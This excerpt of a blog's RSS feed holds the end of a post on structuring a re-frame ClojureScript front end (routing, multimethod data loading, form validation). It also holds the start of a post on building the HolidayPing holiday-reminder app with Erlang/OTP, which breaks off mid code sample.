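&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(defn channel-count-view []&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  (let [n @(re-frame&#x2F;subscribe [:channel-count])]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [:p &amp;quot;You have &amp;quot; n &amp;quot; channels&amp;quot;]))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;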
&lt;p&gt;The one thing I don’t quite like about re-frame is how all definitions (reg-event, reg-sub, reg-fx, reg-cofx) set up some hidden application state. I’d prefer to just have standalone functions and pass a map or some other data structure into a single re-frame initialization step. As it is, it forces you to require namespaces just for the side effects they produce, which doesn’t feel very idiomatic.&lt;&#x2F;p&gt;
&lt;p&gt;While re-frame is a very opinionated framework and provides a lot of structure, there are still some design aspects left to the programmer. What follows are some notes on decisions I had to make; a lot of it I figured out along the way and there may be better ways to do it. Critiques and suggestions are certainly welcome.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;routing-and-navigation&quot;&gt;Routing and navigation&lt;&#x2F;h3&gt;
&lt;p&gt;Perhaps the most complex part of the front end application was properly handling navigation. It’s also the place where you pay the penalty of using a SPA framework to build an application that requires browser-like logic (i.e. multiple entry points based on the URL, working back&#x2F;forward buttons, etc.).&lt;&#x2F;p&gt;
&lt;p&gt;Initially it was simple, I just followed the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Day8&#x2F;re-frame&#x2F;blob&#x2F;master&#x2F;docs&#x2F;Navigation.md&quot;&gt;re-frame documentation&lt;&#x2F;a&gt;: you add an &lt;em&gt;:active-panel&lt;&#x2F;em&gt; value to your application state, update it when the user produces a navigation event (e.g. select a tab) and make your main view show the proper component based on the &lt;em&gt;:active-panel&lt;&#x2F;em&gt; current value.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(def panels {:panel1 [panel1]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             :panel2 [panel2]})&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(defn high-level-view &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  []&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  (let [active (re-frame&#x2F;subscribe [:active-panel])]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (fn []&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      [:div&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       [:div.title   &amp;quot;Heading&amp;quot;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       (get panels @active)])))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This was enough to get me going, but my first concern was how to fetch different data from the server based on the selected panel (i.e. when I’m on the channel list, GET &#x2F;api&#x2F;channels; when I’m on the calendar for channel &lt;em&gt;my-channel&lt;&#x2F;em&gt; , GET &#x2F;api&#x2F;channels&#x2F;my-channel&#x2F;holidays; etc.). The first idea that came to mind was to just trigger a request event inside the component view function, but this was directly against the philosophy of keeping logic out of the views.&lt;&#x2F;p&gt;
&lt;p&gt;Asking in the re-frame Slack channel, I got the suggestion of just fetching all the required data when the user enters the application, load it in the in-memory app-db and use that as the source of truth instead of synchronizing with the server on every step. I wasn’t entirely convinced by this, especially as the application grew bigger, but it was better than polluting view functions with logic and, again, enough to move forward.&lt;&#x2F;p&gt;
&lt;p&gt;Eventually, though, the API reached a point where this approach was impractical and inefficient: we had multiple endpoints which more or less mapped to different views in the UI, and we couldn’t just load all the data to cover every possible navigation path. Moreover, with very distinct views it was time to bring in URLs and the expected browser behavior: proper routing, interacting with the history API. I turned to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;juxt&#x2F;bidi&quot;&gt;bidi&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;kibu-australia&#x2F;pushy&quot;&gt;pushy&lt;&#x2F;a&gt;, based on a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;pupeno.com&#x2F;2015&#x2F;08&#x2F;26&#x2F;no-hashes-bidirectional-routing-in-re-frame-with-bidi-and-pushy&#x2F;&quot;&gt;tutorial by J. Pablo Fernández&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Now we needed some way to specify what data was to be fetched for each route, without cluttering the views; I came up with a generic event handler, using multimethods:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(re-frame&#x2F;reg-event-fx&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; :navigate&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; (fn [{:keys [db]} [_ new-view]]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   {;; trigger the load-view event in case data from the server is required&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    :dispatch    [:load-view new-view] &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ;; update the browser history API and switch to the given view&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    :set-history new-view&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ;; set the current view in the app-db so the dom is updated&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    :db          (assoc db&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                        :loading-view? true&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                        :current-view new-view)}))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(defmulti load-view&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &amp;quot;Create a multimethod that will implement different event handlers based on the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   view keyword.&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  (fn [cofx [view]] view))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(re-frame&#x2F;reg-event-fx&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; :load-view&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; (fn [cofx [_ new-view]]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   ;; delegate event handling to the proper multimethod&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   (load-view cofx [new-view])))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(defmethod load-view &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  :default&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  [{:keys [db]} _]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ;; by default don&amp;#39;t load anything&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  {:db (assoc db :loading-view? false)})&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(defmethod load-view&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  :channel-list&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  [_ _]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ;; when navigating to the channel list, fetch the channels&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  {:http-xhrio {:method     :get&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                :uri        &amp;quot;&#x2F;api&#x2F;channels&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                :on-success [:channel-list-success]}})&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Even though this felt a bit hacky, seeing the view functions become cleaner somewhat validated the approach. For such an opinionated framework, though, I wished there was a recommended way to handle this use case, which is probably a frequent one (maybe there is and I just didn’t find it).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;forms-and-validations&quot;&gt;Forms and validations&lt;&#x2F;h3&gt;
&lt;p&gt;There must be few tasks as repetitive as writing forms in a web application, especially if there are many CRUD components. After writing a couple of them, I obviously started looking for ways to build a reusable component that would create them based on a specification. I managed to do so, again by resorting to multimethods, such that each method would render differently based on the input type (text, password, select, etc.); the API ended up looking like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[forms&#x2F;form-view {:submit-text &amp;quot;Register&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                  :on-submit   [:register-submit]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                  :fields      [{:key      :email&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :type     &amp;quot;email&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :validate :valid-email?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :required true}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                {:key      :password&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :type     &amp;quot;password&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :required true}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                {:key      :password-repeat&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :type     &amp;quot;password&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :label    &amp;quot;Repeat password&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :validate :matching-passwords?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                                 :required true}]}]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The form-view maintains a local state atom, and when the submit button is clicked, the :on-submit event is triggered, passing the current input values.&lt;&#x2F;p&gt;
&lt;p&gt;It took me a couple of iterations to properly integrate these form components with the rest of the app, especially when I needed to pre-populate them with data coming from other views or from back end responses. This was the one area where I had to get a bit more familiar with React internals, for example learning about &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;goshakkk.name&#x2F;controlled-vs-uncontrolled-inputs-react&#x2F;&quot;&gt;controlled and uncontrolled components&lt;&#x2F;a&gt;. After introducing the load-view handler described in the previous section, this kind of issue went away.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, I needed a way to introduce reusable validations to the form component, without breaking the “no logic in views” rule. I found that encapsulating validation in subscription handlers worked really well. I could specify validations as part of the form specification, subscribe to them to change the style of erroneous inputs and disable submit buttons, and also use the same validations outside of the forms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(re-frame&#x2F;reg-sub&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; :valid-required?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; (fn [db [_ value]]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   (if (string&#x2F;blank? value)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     [false &amp;quot;This field is required.&amp;quot;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     [true])))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(re-frame&#x2F;reg-sub&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; :valid-form?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; (fn [[_ form fields]]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   (-&amp;gt;&amp;gt; fields&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (get-validation-subs form)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (map re-frame&#x2F;subscribe)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (doall)))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(fn [validations _]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   (every? true? (map first validations))))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;closing-thoughts&quot;&gt;Closing thoughts&lt;&#x2F;h3&gt;
&lt;p&gt;This was a modest project and as such didn’t reveal any higher truth. Instead, it reinforced some ideas and reminded us of things we tend to forget. I liked that it gave us a perspective different from the one we’re used to, working mainly as back end engineers: this time we had to write a front end to our own APIs and be users of our own interfaces.&lt;&#x2F;p&gt;
&lt;p&gt;A good design should model the domain of the problem it is trying to solve, rather than accommodate immediate client needs. But as engineers we have to expect the user experience to reveal aspects of the domain that we missed, that were unforeseeable, or that plainly didn’t exist at the design stage. You need a UI to be able to poke around the application, see what feels right and what doesn’t, and change the model accordingly. In our case, as soon as we started to use the front end, we realized that the relationships between our entities had to be turned around. More interestingly, once we made those changes the code became simpler in ways we hadn’t considered.&lt;&#x2F;p&gt;
&lt;p&gt;This is no news, but front end work takes a lot of effort. We were aiming for a very simple UI, one that covered a fraction of the application surface, and it still required more work and far more trial and error than the back end. The dumbest front end application takes a non-trivial amount of work to get right and to provide an adequate user experience; traditional server-side applications, on the other hand, keep getting easier and easier to put together, even as they arguably become extinct.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Holiday Ping: how we implemented our first open source app with Erlang and Clojurescript</title>
          <pubDate>Tue, 14 Nov 2017 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/holiday-ping-how-we-implemented-our-first-open-source-app-with-erlang-and-clojurescript/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/holiday-ping-how-we-implemented-our-first-open-source-app-with-erlang-and-clojurescript/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/holiday-ping-how-we-implemented-our-first-open-source-app-with-erlang-and-clojurescript/">&lt;p&gt;After almost ten years of working as a developer for different companies, two years ago I started my own company &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt;. I did so because I wanted to have more freedom in choosing the type of projects and team I work with.&lt;&#x2F;p&gt;
&lt;p&gt;That is why today is a very special day for me. We take a break from regular interviews and celebrate the release of our first open source application: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;holidayping.lambdaclass.com&#x2F;&quot;&gt;Holiday Ping&lt;&#x2F;a&gt;. Facundo Olano is the main developer of the application, which was written in two of the best programming languages we know (Clojure and Erlang) on top of our favorite database (PostgreSQL). This post was written by him and tells his journey and the lessons learned on the backend side. A similar post on the frontend is forthcoming. If you find any issue or want to help, check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;holiday_ping&quot;&gt;GitHub&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Discuss and vote at&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;mgefw9&#x2F;holiday_ping_how_we_implemented_our_first&quot;&gt; &lt;em&gt;lobsters&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;,&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;7cweat&#x2F;holiday_ping_how_we_implemented_our_first_open&#x2F;&quot;&gt;&lt;em&gt;reddit&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;and&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=15695955&quot;&gt; &lt;em&gt;hn&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-9ngymzWNwkPMhZ9u7uZ_XA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;background&quot;&gt;&lt;strong&gt;Background&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Earlier this year I joined LambdaClass, a Buenos Aires-based software consultancy founded a while ago by some colleagues and schoolmates. LambdaClass has a special interest in distributed systems, and while it’s not exclusively an Erlang shop, most of its projects are implemented in &lt;em&gt;BEAM&lt;&#x2F;em&gt; languages.&lt;&#x2F;p&gt;
&lt;p&gt;Although I have a recent background in microservices and functional languages (mainly Clojure), I needed some time to ramp up and gain experience with the OTP platform and its underlying philosophy. I started working on some of the LambdaClass projects right away, but there are aspects of the learning process, especially those related to architecture and design, that are best experienced in greenfield projects. The company also has the goal of a strong open source presence, hence the decision to spend part of my time on public side projects.&lt;&#x2F;p&gt;
&lt;p&gt;We considered a couple of mid-sized projects and implemented one of them (which arguably looked smaller in scope than it ended up being). The purpose of this document is to share our experience, put some of our discussions into words so we can consolidate our understanding of them, and draw conclusions that can help us in future projects.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-project&quot;&gt;The Project&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;holidayping.lambdaclass.com&quot;&gt;HolidayPing&lt;&#x2F;a&gt; is a small web application that sends holiday reminders through different services like email and Slack. It’s mainly aimed at consultants and freelancers used to working with clients abroad. It’s free of charge and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;holiday_ping&quot;&gt;open source&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;spin-off-projects&quot;&gt;Spin-off projects&lt;&#x2F;h3&gt;
&lt;p&gt;As part of the HolidayPing effort, we have started to design and implement some open source tools that solve a couple of problems we identified as recurring: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;throttle&quot;&gt;throttle&lt;&#x2F;a&gt;, to perform access control over resources such as API endpoints, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;reconnections&quot;&gt;reconnections&lt;&#x2F;a&gt;, to initiate and maintain connections to external services in an OTP-idiomatic way.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-backend&quot;&gt;The Backend&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;language-erlang-vs-elixir&quot;&gt;Language: Erlang vs. Elixir&lt;&#x2F;h4&gt;
&lt;p&gt;The first decision was the programming language: Erlang or Elixir. We use both at LambdaClass, so I’d eventually have to learn both; the question was which one was more effective to learn first, considering the twin goals of being productive and of properly understanding the Erlang platform in the long run.&lt;&#x2F;p&gt;
&lt;p&gt;Elixir would have probably been easier, considering my previous background and that it has a syntax closer to other modern languages. But learning it first carried the risk of just scratching the surface of OTP: using the language like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=ChUB5Oj2Jj4&quot;&gt;it’s the new Ruby&lt;&#x2F;a&gt;, and hiding what’s going on underneath. It does seem like it’s simpler to get a good understanding of the “OTP way” by starting with Erlang, especially since &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;learnyousomeerlang.com&#x2F;&quot;&gt;there’s literature that guides you through the process&lt;&#x2F;a&gt;. Then, switching to Elixir would mostly consist of getting familiar with a new syntax and a few language features.&lt;&#x2F;p&gt;
&lt;p&gt;We understand that as Elixir is gaining popularity and more Elixir code is being written, a deeper understanding of Erlang and OTP will become a valuable asset for the company. In addition, many robust and useful libraries are written in Erlang and being able to dive in the code is important.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;learning-erlang&quot;&gt;Learning Erlang&lt;&#x2F;h4&gt;
&lt;p&gt;A quick note on my impressions of the language: I found it to be very expressive, mostly because of pattern matching; coming from Clojure, I didn’t have issues grasping Erlang’s functional aspects; contrary to a lot of people, I don’t mind the syntax, and I actually like it a lot with the exception of some notable quirks (one comes to mind: binary literals, while very powerful, are very inconvenient as a string replacement). As my coworkers kept telling me and I later confirmed: OTP is the big deal, not the language itself.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;application-and-supervisor-structure&quot;&gt;Application and supervisor structure&lt;&#x2F;h4&gt;
&lt;p&gt;At a high level, the application can be divided into the following components:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A RESTful API, mostly for CRUD operations.&lt;&#x2F;li&gt;
&lt;li&gt;A process that periodically checks whether reminders should be sent (e.g. today is a holiday in Bob’s country, and Bob asked to send reminders through the Slack and email channels).&lt;&#x2F;li&gt;
&lt;li&gt;Worker processes that send the reminders.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;rest-api&quot;&gt;Rest API&lt;&#x2F;h3&gt;
&lt;p&gt;The CRUD API didn’t require much thinking, at least from the OTP point of view. It’s implemented with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ninenines.eu&#x2F;docs&#x2F;en&#x2F;cowboy&#x2F;2.0&#x2F;guide&#x2F;rest_handlers&#x2F;&quot;&gt;Cowboy rest handlers&lt;&#x2F;a&gt;, and I’ll just note that the library does a great job at forcing you to define a well behaved REST server without too much code.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;reminder-checker&quot;&gt;Reminder checker&lt;&#x2F;h4&gt;
&lt;p&gt;The processes involved in the reminders were more interesting, and obviously more important since the value of the application depends on them working properly (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;jlouisramblings.blogspot.com.ar&#x2F;2010&#x2F;11&#x2F;on-erlang-state-and-crashes.html&quot;&gt;this is the “error kernel” of the app&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;The process that checks whether reminders should be sent (remind_checker) is a gen_server that uses timer:send_interval to periodically query the database for the reminders that are due. It then triggers worker creation with the necessary data to send them.&lt;&#x2F;p&gt;
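&lt;p&gt;As a rough sketch of that shape (module and function names here are illustrative, not the actual HolidayPing source), the checker boils down to a gen_server that schedules a recurring message to itself and reacts to it:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-module(remind_checker).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-behaviour(gen_server).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-export([start_link&#x2F;0, init&#x2F;1, handle_info&#x2F;2]).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
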